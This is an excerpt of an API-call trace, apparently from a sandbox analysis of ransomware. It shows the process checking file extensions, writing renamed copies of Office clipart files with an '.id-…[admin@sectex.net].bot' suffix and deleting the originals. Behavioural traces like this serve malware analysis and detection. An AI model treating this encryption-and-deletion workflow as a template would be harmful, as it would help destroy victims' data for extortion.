	[0159.650] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.650] lstrlenW (lpString=".pdf") returned 4
	[0159.650] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString=".xls") returned 4
	[0159.650] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.650] lstrlenW (lpString=".xlsx") returned 5
	[0159.650] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.650] lstrlenW (lpString=".ppt") returned 4
	[0159.650] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.650] lstrlenW (lpString=".zip") returned 4
	[0159.650] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.650] lstrlenW (lpString=".rar") returned 4
	[0159.650] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString=".bz2") returned 4
	[0159.650] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString=".7z") returned 3
	[0159.650] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.650] lstrlenW (lpString=".dbf") returned 4
	[0159.650] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.650] lstrlenW (lpString=".1cd") returned 4
	[0159.650] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.650] lstrlenW (lpString=".jpg") returned 4
	[0159.650] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.650] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.651] lstrlenW (lpString=".doc") returned 4
	[0159.651] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.651] lstrlenW (lpString=".docx") returned 5
	[0159.651] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.651] lstrlenW (lpString=".pdf") returned 4
	[0159.651] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.651] lstrlenW (lpString=".xls") returned 4
	[0159.651] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.651] lstrlenW (lpString=".xlsx") returned 5
	[0159.651] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.651] lstrlenW (lpString=".ppt") returned 4
	[0159.651] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.651] lstrlenW (lpString=".zip") returned 4
	[0159.651] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.651] lstrlenW (lpString=".rar") returned 4
	[0159.651] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.651] lstrlenW (lpString=".bz2") returned 4
	[0159.651] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.651] lstrlenW (lpString=".7z") returned 3
	[0159.651] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.651] lstrlenW (lpString=".dbf") returned 4
	[0159.651] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.651] lstrlenW (lpString=".1cd") returned 4
	[0159.651] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105912.WMF") returned 63
	[0159.651] lstrlenW (lpString=".jpg") returned 4
	[0159.651] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.652] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.652] lstrlenW (lpString="J0106572.WMF") returned 12
	[0159.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0159.785] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2148) returned 1
	[0159.785] CloseHandle (hObject=0x37c) returned 1
	[0159.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf")) returned 0x20
	[0159.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0159.786] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.786] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0159.786] GetLastError () returned 0x0
	[0159.786] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x864, lpOverlapped=0x0) returned 1
	[0159.800] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x870, lpOverlapped=0x0) returned 1
	[0159.801] ReadFile (in: hFile=0x37c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.801] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.801] SetEndOfFile (hFile=0x398) returned 1
	[0159.801] CloseHandle (hObject=0x398) returned 1
	[0159.801] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.801] SetEndOfFile (hFile=0x37c) returned 1
	[0159.804] CloseHandle (hObject=0x37c) returned 1
	[0159.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.941] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf")) returned 1
	[0159.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.955] lstrlenW (lpString=".doc") returned 4
	[0159.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.955] lstrlenW (lpString=".docx") returned 5
	[0159.955] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.956] lstrlenW (lpString=".pdf") returned 4
	[0159.956] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString=".xls") returned 4
	[0159.956] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.956] lstrlenW (lpString=".xlsx") returned 5
	[0159.956] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.956] lstrlenW (lpString=".ppt") returned 4
	[0159.956] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.956] lstrlenW (lpString=".zip") returned 4
	[0159.956] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.956] lstrlenW (lpString=".rar") returned 4
	[0159.956] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString=".bz2") returned 4
	[0159.956] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString=".7z") returned 3
	[0159.956] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.956] lstrlenW (lpString=".dbf") returned 4
	[0159.956] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.956] lstrlenW (lpString=".1cd") returned 4
	[0159.956] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.956] lstrlenW (lpString=".jpg") returned 4
	[0159.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.956] lstrlenW (lpString=".doc") returned 4
	[0159.956] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.956] lstrlenW (lpString=".docx") returned 5
	[0159.957] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0159.957] lstrlenW (lpString=".pdf") returned 4
	[0159.957] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.957] lstrlenW (lpString=".xls") returned 4
	[0159.957] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.957] lstrlenW (lpString=".xlsx") returned 5
	[0159.957] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0159.957] lstrlenW (lpString=".ppt") returned 4
	[0159.957] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.957] lstrlenW (lpString=".zip") returned 4
	[0159.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.957] lstrlenW (lpString=".rar") returned 4
	[0159.957] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.957] lstrlenW (lpString=".bz2") returned 4
	[0159.957] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.957] lstrlenW (lpString=".7z") returned 3
	[0159.957] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.957] lstrlenW (lpString=".dbf") returned 4
	[0159.957] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.957] lstrlenW (lpString=".1cd") returned 4
	[0159.957] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63
	[0159.957] lstrlenW (lpString=".jpg") returned 4
	[0159.957] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.958] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.958] lstrlenW (lpString="J0107130.WMF") returned 12
	[0159.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.958] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=27084) returned 1
	[0159.958] CloseHandle (hObject=0x3c4) returned 1
	[0159.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf")) returned 0x20
	[0159.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.959] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.959] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0160.158] GetLastError () returned 0x0
	[0160.158] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x69cc, lpOverlapped=0x0) returned 1
	[0160.165] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x69d0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x69d0, lpOverlapped=0x0) returned 1
	[0160.167] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.167] WriteFile (in: hFile=0x1d8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.167] SetEndOfFile (hFile=0x1d8) returned 1
	[0160.167] CloseHandle (hObject=0x1d8) returned 1
	[0160.167] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.167] SetEndOfFile (hFile=0x3c4) returned 1
	[0160.169] CloseHandle (hObject=0x3c4) returned 1
	[0160.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.173] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107130.wmf")) returned 1
	[0160.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.176] lstrlenW (lpString=".doc") returned 4
	[0160.176] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.176] lstrlenW (lpString=".docx") returned 5
	[0160.176] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0160.176] lstrlenW (lpString=".pdf") returned 4
	[0160.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.176] lstrlenW (lpString=".xls") returned 4
	[0160.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.177] lstrlenW (lpString=".xlsx") returned 5
	[0160.177] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0160.177] lstrlenW (lpString=".ppt") returned 4
	[0160.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.177] lstrlenW (lpString=".zip") returned 4
	[0160.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.177] lstrlenW (lpString=".rar") returned 4
	[0160.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.177] lstrlenW (lpString=".bz2") returned 4
	[0160.177] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.177] lstrlenW (lpString=".7z") returned 3
	[0160.177] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.177] lstrlenW (lpString=".dbf") returned 4
	[0160.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.177] lstrlenW (lpString=".1cd") returned 4
	[0160.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.177] lstrlenW (lpString=".jpg") returned 4
	[0160.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.177] lstrlenW (lpString=".doc") returned 4
	[0160.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.177] lstrlenW (lpString=".docx") returned 5
	[0160.177] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0160.177] lstrlenW (lpString=".pdf") returned 4
	[0160.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.178] lstrlenW (lpString=".xls") returned 4
	[0160.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.178] lstrlenW (lpString=".xlsx") returned 5
	[0160.178] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0160.178] lstrlenW (lpString=".ppt") returned 4
	[0160.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.178] lstrlenW (lpString=".zip") returned 4
	[0160.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.178] lstrlenW (lpString=".rar") returned 4
	[0160.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.178] lstrlenW (lpString=".bz2") returned 4
	[0160.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.178] lstrlenW (lpString=".7z") returned 3
	[0160.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.178] lstrlenW (lpString=".dbf") returned 4
	[0160.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.178] lstrlenW (lpString=".1cd") returned 4
	[0160.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF") returned 63
	[0160.178] lstrlenW (lpString=".jpg") returned 4
	[0160.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.178] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.178] lstrlenW (lpString="J0107154.WMF") returned 12
	[0160.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.179] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=22300) returned 1
	[0160.179] CloseHandle (hObject=0x3f0) returned 1
	[0160.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf")) returned 0x20
	[0160.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.180] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.180] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.180] GetLastError () returned 0x0
	[0160.180] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x571c, lpOverlapped=0x0) returned 1
	[0160.188] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5720, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5720, lpOverlapped=0x0) returned 1
	[0160.189] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.190] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.190] SetEndOfFile (hFile=0x398) returned 1
	[0160.190] CloseHandle (hObject=0x398) returned 1
	[0160.190] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.190] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.192] CloseHandle (hObject=0x3f0) returned 1
	[0160.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.193] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf")) returned 1
	[0160.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.193] lstrlenW (lpString=".doc") returned 4
	[0160.193] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.193] lstrlenW (lpString=".docx") returned 5
	[0160.193] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0160.193] lstrlenW (lpString=".pdf") returned 4
	[0160.193] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.193] lstrlenW (lpString=".xls") returned 4
	[0160.194] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.194] lstrlenW (lpString=".xlsx") returned 5
	[0160.194] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
